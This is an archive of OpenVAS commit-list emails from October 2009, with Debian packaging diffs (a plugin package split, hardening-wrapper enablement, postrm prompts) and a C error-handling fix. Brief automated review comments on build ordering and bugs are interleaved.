trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 23:04:00 UTC (rev 5418) +++ 
trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 23:16:31 UTC (rev 5419) @@ -1,5 +1,21 @@ -openvas-plugins-dfsg (1.0.7-3) unstable; urgency=low +openvas-plugins-dfsg (1.0.7-4+svn20090920) unstable; urgency=low + * Create a new openvas-plugins-base binary package that provides the + .nes files as well as the openvas-nvt-sync script and manpage. + * Adjust dependencies of the packages accordingly, openvas-plugins-base + depends on rsync and openvas-plugins-dfsg depends on -base + * Add a lintian override for the errors related to using 'read' in + postrm. Debconf is not an option here since it might not be available. + * debian/rules improvements: + - Add dh_installmanpages to install the new manpage + - Add dh_installdirs in the install target + - Change dh_clean -k to dh_prep in the install target + + -- Javier Fernandez-Sanguino Pen~a Wed, 23 Sep 2009 00:08:26 +0200 + +openvas-plugins-dfsg (1.0.7-3+svn20090920) unstable; urgency=low + + * Update the plugins with their latest SVN versions * Add slad_run.nasl to audit/remove-list since it ellicits an error when starting openvasd * Update the manual page to include a reference to RSYNC_PROXY, useful 
@@ -7,6 +23,13 @@ * Fix bug in grep call of audit/generate-license-list * Rename openvas-plugins.* files to openvas-plugins-dfsg.* under debian/ so that they are shipped as part of the package. + * Create usr/lib and move the .nes files so dependencies get calculated + properly + * debian/rules improvements: + - make config.status depend on patch-stamp so that the configure + script does not get rerun when running the install target + - do not generate the audit exclude-list if already present + - separate exclude-file generation to its own target -- Javier Fernandez-Sanguino Pen~a Sun, 20 Sep 2009 10:44:53 +0200 Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration (from rev 5414, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config) Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration/openvas-plugins-dfsg.templates.NEW =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins-dfsg.templates.NEW 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration/openvas-plugins-dfsg.templates.NEW 2009-10-06 23:16:31 UTC (rev 5419) 
@@ -0,0 +1,10 @@ +Template: openvas-plugins/remove_plugins_dir +Type: boolean +Default: true +_Description: Remove all the files in the OpenVAS plugins directory? + The /var/lib/openvas/plugins directory contains plugins besides + the ones distributed by the package. This might happen if you + have downloaded additional plugins (using openvas-nvt-sync) + . + You currently have ${countnewplugs} plugin(s) which have not been + provided by this package. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 23:16:31 UTC (rev 5419) @@ -12,7 +12,7 @@ Package: openvas-plugins-dfsg Section: net Architecture: any -Depends: ${shlibs:Depends}, ${misc:Depends}, rsync +Depends: ${misc:Depends}, openvas-plugins-base Recommends: openvas-server (>= 1.0), nmap, smbclient, snmp Suggests: openvas-client, pnscan, strobe, ike-scan Provides: openvas-plugins 
@@ -27,5 +27,19 @@ OpenVAS-Client, provides an X11/GTK+ user interface. . This package contains the DFSG-free OpenVAS plugins, a set of security tests - as well as scripts to build additional plugins. It also provides the - infrastructure for downloading updated plugins from OpenVAS. + as well as scripts to build additional plugins. + +Package: openvas-plugins-base +Section: net +Architecture: any +Depends: ${shlibs:Depends}, ${misc:Depends}, rsync +Recommends: openvas-server (>= 1.0), openvas-plugins-dfsg +Conflicts: openvas-server (<= 2.0.3-2) +Description: remote network security auditor - basic plugins + The Open Vulnerability Assessment System is a modular security auditing + tool, used for testing remote systems for vulnerabilities that should be + fixed. + . + This package contains the basic plugins: find_service, openvas_tcp_scanner, + ssl_ciphers and synscan. As well as the script needed for downloading updated + plugins from OpenVAS. Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages 2009-10-06 23:16:31 UTC (rev 5419) @@ -1 +0,0 @@ -debian/openvas-nvt-sync.8 Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 23:16:31 UTC (rev 5419) 
@@ -31,8 +31,8 @@ .B openvas-nvt-sync uses rsync(1) to retrieve the archive of the new plugins. The scripts provided by the OpenVAS project might -.B not be signed -\. Consequently, if somewhere where to poison your DNS server and force this +.B not be signed. +Consequently, if somewhere where to poison your DNS server and force this script to retrieve NASL plugins on another site he would force your OpenVAS server to execute NASL scripts when running security tests. Even if this might not do much harm (see the NASL reference guide Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.install =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.install 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.install 2009-10-06 23:16:31 UTC (rev 5419) @@ -0,0 +1,3 @@ +usr/lib/openvas/plugins +usr/sbin +usr/share/man Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.manpages (from rev 5416, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages) Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs 2009-10-06 23:16:31 UTC (rev 5419) 
@@ -1,2 +1,3 @@ var/lib/openvas/plugins var/lib/openvas/plugins-factory +usr/share/lintian/overrides Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.install =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.install 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.install 2009-10-06 23:16:31 UTC (rev 5419) @@ -0,0 +1 @@ +var/lib/openvas/plugins Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.lintian-overrides =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.lintian-overrides 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.lintian-overrides 2009-10-06 23:16:31 UTC (rev 5419) @@ -0,0 +1,4 @@ +# We need to use read in the maintainer script +# in order to remove properly the files on purge. +# Debconf is not an option here since it might not be available: +openvas-plugins-dfsg binary: read-in-maintainer-script Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm 2009-10-06 23:16:31 UTC (rev 5419) 
@@ -4,8 +4,8 @@ echo "" echo "The /usr/lib/openvas/plugins directory still exists." echo "This might be because you downloaded additional plugins into it" - echo "when using a previous Nessus version." - echo -n "Do you want to remove the full directory now? " + echo "when using a previous OpenVAS version." + echo -n "Do you want to remove the full directory now? (yes/no) " read ANSWER case $ANSWER in [yY]*) rm -rf /usr/lib/openvas/plugins ;; @@ -17,10 +17,10 @@ echo "The /var/lib/openvas/plugins directory still exists." echo "This might be because you downloaded additional plugins into it." if [ -d /var/lib/openvas/plugins/.desc ]; then - echo "Or because the openvasd package was not fully purged." + echo "Or because the openvas-server package was not fully purged." fi echo "" - echo -n "Do you want to remove the full directory now? " + echo -n "Do you want to remove the full directory now? (yes/no) " read ANSWER case $ANSWER in [yY]*) rm -rf /var/lib/openvas/plugins ;; Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 23:16:31 UTC (rev 5419) @@ -6,7 +6,7 @@ include /usr/share/dpatch/dpatch.make -tmp := $(CURDIR)/debian/openvas-plugins-dfsg +tmp := $(CURDIR)/debian/tmp CFLAGS := -g -Wall ifneq "$(findstring noopt,$(DEB_BUILD_OPTIONS))" "" 
@@ -16,13 +16,15 @@ endif build: build-stamp -build-stamp: config.status +build-stamp: config.status audit/exclude-list dh_testdir $(MAKE) - ( cd audit && sh exclude-plugins >exclude-list ) touch $@ -config.status: configure patch +audit/exclude-list: + ( cd audit && test -f exclude-list || sh exclude-plugins >exclude-list ) + +config.status: configure patch-stamp CFLAGS="$(CFLAGS)" ./configure --sysconfdir=/etc --prefix=/usr \ --mandir='$${prefix}/share/man' --localstatedir=/var/run \ --with-fetchcmd=wget --libdir=/var/lib 
@@ -34,43 +36,60 @@ touch openvas.tmpl [ ! -f Makefile ] || $(MAKE) distclean -rm -rf audit/exclude-list - dh_clean build-stamp + dh_clean build-stamp patched [ ! -f libtool ] || rm -f libtool [ ! -d bin/ ] || rm -rf bin/ -install: build-stamp +install: build-stamp audit/exclude-list dh_testdir dh_testroot - dh_clean -k + dh_prep + dh_installdirs $(MAKE) install prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib -# After we install we remove the plugins we want to exclude and -# audit the remaining plugins +# After we install we remove the plugins we want to exclude from the +# package ( cd $(tmp)/var/lib/openvas/plugins ; cat $(CURDIR)/audit/exclude-list $(CURDIR)/audit/remove-list | xargs rm -f ) +# Move the libraries to /usr/lib + mkdir -p $(tmp)/usr/lib/openvas/plugins + mv $(tmp)/var/lib/openvas/plugins/*nes $(tmp)/usr/lib/openvas/plugins + cp debian/openvas-plugins-dfsg.lintian-overrides \ + debian/openvas-plugins-dfsg/usr/share/lintian/overrides/openvas-plugins-dfsg + + +audit-plugins: audit-plugins-stamp +audit-plugins-stamp: +# Audit the plugins installed in the package ( cd audit && sh audit-plugins $(tmp)/var/lib/openvas/plugins ) + touch $@ # If the audit passes we continue binary-indep: # Nothing to do, no arch-indep packages here. 
-binary-arch: install +binary-arch: install audit-plugins dh_testdir dh_testroot - dh_installdebconf +# Move the files to the openvas-plugins-base package + dh_install --sourcedir=$(tmp) dh_installdocs docs/plugins_api.txt + dh_installchangelogs + dh_installman -popenvas-plugins-base dh_installexamples extra/describe-openvas-plugin - dh_installchangelogs + dh_installdebconf dh_link ifeq "$(findstring nostrip,$(DEB_BUILD_OPTIONS))" "" dh_strip strip --strip-unneeded --remove-section=.comment --remove-section=.note \ - $(tmp)/var/lib/openvas/plugins/*.nes + debian/openvas-plugins-base/usr/lib/openvas/plugins/*.nes endif dh_compress dh_fixperms + dh_makeshlibs dh_installdeb - dpkg-shlibdeps -Tdebian/openvas-plugins.substvars \ - $(tmp)/var/lib/openvas/plugins/*.nes +# dh_shlibdeps + dpkg-shlibdeps -Tdebian/openvas-plugins-base.substvars \ + debian/openvas-plugins-base/usr/lib/openvas/plugins/*.nes dh_gencontrol dh_md5sums dh_builddeb From scm-commit at wald.intevation.org Wed Oct 7 01:18:00 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:18:00 +0200 (CEST) Subject: [Openvas-commits] r5420 - trunk/openvas-packaging/openvas-client/debian/trunk/debian Message-ID: <20091006231800.B5B58861EAAA@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 01:18:00 +0200 (Wed, 07 Oct 2009) New Revision: 5420 Modified: trunk/openvas-packaging/openvas-client/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-client/debian/trunk/debian/control trunk/openvas-packaging/openvas-client/debian/trunk/debian/rules Log: Enable hardening-wrapper Modified: trunk/openvas-packaging/openvas-client/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-client/debian/trunk/debian/changelog 2009-10-06 23:16:31 UTC (rev 5419) +++ trunk/openvas-packaging/openvas-client/debian/trunk/debian/changelog 2009-10-06 23:18:00 UTC (rev 5420) 
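Review bot: in the debian/rules hunks of r5419, audit-plugins-stamp has no prerequisite, so `binary-arch: install audit-plugins` depends on make processing prerequisites left to right to get the audit after the install; that ordering is not guaranteed under a parallel build. Give the stamp an explicit dependency on the install step. As far as the clean hunk shows, `dh_clean build-stamp patched` does not remove audit-plugins-stamp, so a rebuild in the same tree would skip the plugin audit entirely. The lintian override is copied to a hard-coded debian/openvas-plugins-dfsg/usr/share/lintian/overrides path while the rest of the install target now goes through $(tmp); a short comment explaining why this one file bypasses debian/tmp would help.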
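Review bot: in the openvas-plugins-dfsg.postrm hunk of r5419 the two `read ANSWER` calls are kept, and the script shown in full earlier in this series starts with `#!/bin/sh -e`. When the purge runs with no terminal on stdin, read returns non-zero at end of input and the -e flag aborts the postrm, so the purge fails instead of defaulting to "no". Since the new lintian override documents that read is intentional, make the non-interactive case explicit, for example `read ANSWER || ANSWER=no`. The prompt now says "(yes/no)" but the case pattern `[yY]*` accepts any word starting with y; either is fine, but the prompt and the pattern should agree.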
@@ -1,12 +1,16 @@ openvas-client (3.0.0-beta1) UNRELEASED; urgency=low + [ Jan-Oliver Wagner ] * New upstream release. * control: Added dependency to libopenvas3 * rules: Adjusted to name change nessus->openvas * copyright: Adjusted (libnessus is gone, new authors, copyright) - -- Jan-Oliver Wagner Wed, 30 Sep 2009 15:48:00 +0200 + [ Tim Brown ] + * Enable hardening-wrapper + -- Tim Brown Wed, 07 Oct 2009 00:17:13 +0100 + openvas-client (2.0.5-2) UNRELEASED; urgency=low * Add README.source Modified: trunk/openvas-packaging/openvas-client/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-client/debian/trunk/debian/control 2009-10-06 23:16:31 UTC (rev 5419) +++ trunk/openvas-packaging/openvas-client/debian/trunk/debian/control 2009-10-06 23:18:00 UTC (rev 5420) @@ -3,7 +3,7 @@ Priority: extra Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner -Build-Depends: debhelper (>= 5), dpatch, autotools-dev, libssl-dev, libgtk2.0-dev, libgdchart-gd2-noxpm-dev, libopenvas3-dev +Build-Depends: debhelper (>= 5), dpatch, autotools-dev, libssl-dev, libgtk2.0-dev, libgdchart-gd2-noxpm-dev, libopenvas3-dev, hardening-wrapper Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-client/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-client/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-client/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-client/debian/trunk/debian/rules 2009-10-06 23:16:31 UTC (rev 5419) +++ trunk/openvas-packaging/openvas-client/debian/trunk/debian/rules 2009-10-06 23:18:00 UTC (rev 5420) 
@@ -9,6 +9,8 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 +# Enable hardening-wrapper +export DEB_BUILD_HARDENING=1 # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) From scm-commit at wald.intevation.org Wed Oct 7 01:22:11 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:22:11 +0200 (CEST) Subject: [Openvas-commits] r5421 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091006232211.01B47861EAAC@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 01:22:05 +0200 (Wed, 07 Oct 2009) New Revision: 5421 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/rules Log: Enable hardening-wrapper Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 23:18:00 UTC (rev 5420) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 23:22:05 UTC (rev 5421) 
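Review bot: in the openvas-client debian/rules hunk of r5420, `export DEB_BUILD_HARDENING=1` is inserted directly under the commented-out `#export DH_VERBOSE=1` with no blank line, so the "Uncomment this to turn on verbose mode" block and the new hardening comment run together; separate them with an empty line. The changelog entry and the comment both say only "Enable hardening-wrapper"; a line stating what the maintainers expect the wrapper to change in the built binaries would let a later reviewer check that the setting still has an effect. The same applies to the identical openvas-scanner change in r5421.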
@@ -1,12 +1,16 @@ openvas-scanner (3.0.0.beta3-1) UNRELEASED; urgency=low + [ Michael Wiegand ] * New upstream release. * control: Bumped openvas-libraries dependency. * openvas-scanner.init: Removed superfluous "-D" (now obsolete since becoming a daemon is the default behaviour). - -- Michael Wiegand Tue, 06 Oct 2009 13:53:08 +0200 + [ Tim Brown ] + * Enable hardening-wrapper. + -- Tim Brown Wed, 07 Oct 2009 00:20:52 +0100 + openvas-scanner (3.0.0.beta2-2) UNRELEASED; urgency=low * Make sure the C based NVTs (CNVTs) are actually installed. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control 2009-10-06 23:18:00 UTC (rev 5420) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control 2009-10-06 23:22:05 UTC (rev 5421) 
@@ -3,7 +3,7 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze -Build-Depends: debhelper (>= 5), autotools-dev, libgcrypt11-dev, libglib2.0-dev, libgnutls-dev, libopenvas3-dev (>= 3.0.0-beta3), libpcap-dev, libwrap0-dev, pkg-config, po-debconf, devscripts, dpatch +Build-Depends: debhelper (>= 5), autotools-dev, libgcrypt11-dev, libglib2.0-dev, libgnutls-dev, libopenvas3-dev (>= 3.0.0-beta3), libpcap-dev, libwrap0-dev, pkg-config, po-debconf, devscripts, dpatch, hardening-wrapper Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/rules 2009-10-06 23:18:00 UTC (rev 5420) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/rules 2009-10-06 23:22:05 UTC (rev 5421) @@ -9,6 +9,8 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 +# Enable hardening-wrapper +export DEB_BUILD_HARDENING=1 # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) From scm-commit at wald.intevation.org Wed Oct 7 01:27:22 2009 
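Review bot: in debian/rules of r5421 (openvas-scanner), hunk @@ -9,6 +9,8 @@, export DEB_BUILD_HARDENING=1 is documented only by the comment "Enable hardening-wrapper", which does not say which protections the package is expected to gain or how the result is checked. Extend the comment to state the intent, and if a feature ever has to be switched off for an architecture, do that explicitly next to this export so the exception is visible in review. The new lines are also inserted directly between "#export DH_VERBOSE=1" and the cross-compiling comment without a blank line, so they read as part of the verbose-mode block. The same applies to the identical rules hunks for openvas-client and openvas-libraries.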
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:27:22 +0200 (CEST) Subject: [Openvas-commits] r5423 - trunk/openvas-packaging/openvas-libraries/debian/trunk/debian Message-ID: <20091006232722.6A503861EAAC@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 01:27:17 +0200 (Wed, 07 Oct 2009) New Revision: 5423 Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules Log: Enable hardening-wrapper Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-06 23:20:52 UTC (rev 5422) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-06 23:27:17 UTC (rev 5423) @@ -1,11 +1,15 @@ openvas-libraries (3.0.0-beta3) UNRELEASED; urgency=low - * New upstream release. - * rules: Set sysconfdir at configure time. - * control: Bumped cmake dependency since it was raised upstream. + [ Michael Wiegand ] + * New upstream release + * rules: Set sysconfdir at configure time + * control: Bumped cmake dependency since it was raised upstream - -- Michael Wiegand Tue, 06 Oct 2009 12:06:19 +0200 + [ Tim Brown ] + * Enable hardening-wrapper + -- Tim Brown Wed, 07 Oct 2009 00:25:58 +0100 + openvas-libraries (3.0.0-beta2) UNRELEASED; urgency=low * New upstream release. Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control 2009-10-06 23:20:52 UTC (rev 5422) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control 2009-10-06 23:27:17 UTC (rev 5423) 
@@ -3,7 +3,7 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner -Build-Depends: debhelper (>= 5), autotools-dev, libgnutls-dev, libpcap-dev, libglib2.0-dev, dpatch, libgpgme11-dev (>= 1.1.2), bison, cmake (>= 2.6), libgcrypt11-dev +Build-Depends: debhelper (>= 5), autotools-dev, libgnutls-dev, libpcap-dev, libglib2.0-dev, dpatch, libgpgme11-dev (>= 1.1.2), bison, cmake (>= 2.6), libgcrypt11-dev, hardening-wrapper Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules 2009-10-06 23:20:52 UTC (rev 5422) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules 2009-10-06 23:27:17 UTC (rev 5423) @@ -9,6 +9,8 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 +# Enable hardening-wrapper +export DEB_BUILD_HARDENING=1 # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) From scm-commit at wald.intevation.org Wed Oct 7 09:01:42 2009 
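Review bot: in the debian/changelog hunk of r5423 (openvas-libraries), the entries moved under [ Michael Wiegand ] lose their trailing full stops ("New upstream release." becomes "New upstream release"), which rewrites another uploader's entries in a commit logged only as "Enable hardening-wrapper" and leaves this stanza inconsistent with the 3.0.0-beta2 entry below it, which keeps the full stop. Leave the existing lines unchanged and add only the [ Tim Brown ] section.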
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 09:01:42 +0200 (CEST) Subject: [Openvas-commits] r5424 - in trunk/openvas-plugins: . scripts Message-ID: <20091007070142.33E22852B45B@pyrosoma.intevation.org> Author: jan Date: 2009-10-07 09:01:34 +0200 (Wed, 07 Oct 2009) New Revision: 5424 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/webmirror.nasl Log: * scripts/webmirror.nasl: Added more information about the origin of the script. Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 23:27:17 UTC (rev 5423) +++ trunk/openvas-plugins/ChangeLog 2009-10-07 07:01:34 UTC (rev 5424) @@ -1,3 +1,8 @@ +2009-10-07 Jan-Oliver Wagner + + * scripts/webmirror.nasl: Added more information about + the origin of the script. + 2009-10-06 Michael Meyer * scripts/flatpress_36543.nasl, Modified: trunk/openvas-plugins/scripts/webmirror.nasl =================================================================== --- trunk/openvas-plugins/scripts/webmirror.nasl 2009-10-06 23:27:17 UTC (rev 5423) +++ trunk/openvas-plugins/scripts/webmirror.nasl 2009-10-07 07:01:34 UTC (rev 5424) @@ -6,6 +6,7 @@ # # Saved from # http://patch-tracker.debian.org/patch/misc/view/nessus-plugins/2.2.10-6/scripts/webmirror.nasl +# (nessus internal revision 1.86 released with 2.2.0 in November 2004 under GNU GPL terms) # # Authors: # Renaud Deraison . From scm-commit at wald.intevation.org Wed Oct 7 12:31:20 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 12:31:20 +0200 (CEST) Subject: [Openvas-commits] r5425 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091007103120.96395865F4A5@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 12:31:15 +0200 (Wed, 07 Oct 2009) New Revision: 5425 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Convert NULL returns to ints. Use show_error instead of show_error_and_wait. Add missing success return. Put the final g_free in an else. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 07:01:34 UTC (rev 5424) +++ trunk/openvas-client/ChangeLog 2009-10-07 10:31:15 UTC (rev 5425) @@ -1,3 +1,9 @@ +2009-10-07 Matthew Mundell + + * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Convert + NULL returns to ints. Use show_error instead of show_error_and_wait. + Add missing success return. Put the final g_free in an else. + 2009-10-06 Jan-Oliver Wagner * openvas/prefs_dialog/prefs_scope_tree.c (scope_menu_save): Renamed Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 07:01:34 UTC (rev 5424) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 10:31:15 UTC (rev 5425) 
@@ -1049,34 +1049,37 @@ pwd = open (".", O_RDONLY); if (pwd == -1) { - show_error_and_wait (_("%s: failed to open current directory"), - __FUNCTION__); - return NULL; + show_error (_("%s: failed to open current directory"), + __FUNCTION__); + return -6; } if (chdir (*scope_dir_name)) { - show_error_and_wait (_("%s: failed to chdir to %s"), - context->dir, - __FUNCTION__); - return NULL; + show_error (_("%s: failed to chdir to %s"), + context->dir, + __FUNCTION__); + return -6; } if (symlink ("../openvas_nvt_cache", "openvas_nvt_cache")) { - show_error_and_wait (_("%s: failed to symlink to parent NVT cache"), - __FUNCTION__); - return NULL; + show_error (_("%s: failed to symlink to parent NVT cache"), + __FUNCTION__); + return -6; } if (fchdir (pwd)) - show_error_and_wait (_("%s: failed to fchdir back to previous dir"), - __FUNCTION__); + show_error (_("%s: failed to fchdir back to previous dir"), + __FUNCTION__); close (pwd); + + return 0; } } - g_free (servers_dir_name); + else + g_free (servers_dir_name); show_error (_("%s: check_is_dir"), __FUNCTION__); return -1; From scm-commit at wald.intevation.org Wed Oct 7 12:37:31 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 12:37:31 +0200 (CEST) Subject: [Openvas-commits] r5426 - trunk/openvas-client Message-ID: <20091007103731.82C898518D86@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 12:37:26 +0200 (Wed, 07 Oct 2009) New Revision: 5426 Modified: trunk/openvas-client/ChangeLog Log: * ChangeLog: Mark USE_OMP in last few logs. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 10:31:15 UTC (rev 5425) +++ trunk/openvas-client/ChangeLog 2009-10-07 10:37:26 UTC (rev 5426) 
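Review bot: in prefs_scope_tree.c (r5425), hunk @@ -1049,34 +1049,37 @@ of create_omp_scope, the new "return -6" paths after a failed chdir or symlink leave the descriptor from pwd = open (".", O_RDONLY) open, and the symlink failure path also returns with the process still inside *scope_dir_name because fchdir (pwd) is skipped. Close pwd on both paths and fchdir back before returning from the symlink failure. The chdir message passes context->dir, __FUNCTION__ to the format "%s: failed to chdir to %s", so the two values print in swapped positions, and the directory reported is context->dir while the call used *scope_dir_name; pass __FUNCTION__ first and the directory that was actually tried second. A failed fchdir back is only logged and the function then reaches "return 0", which reports success while the working directory is wrong.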
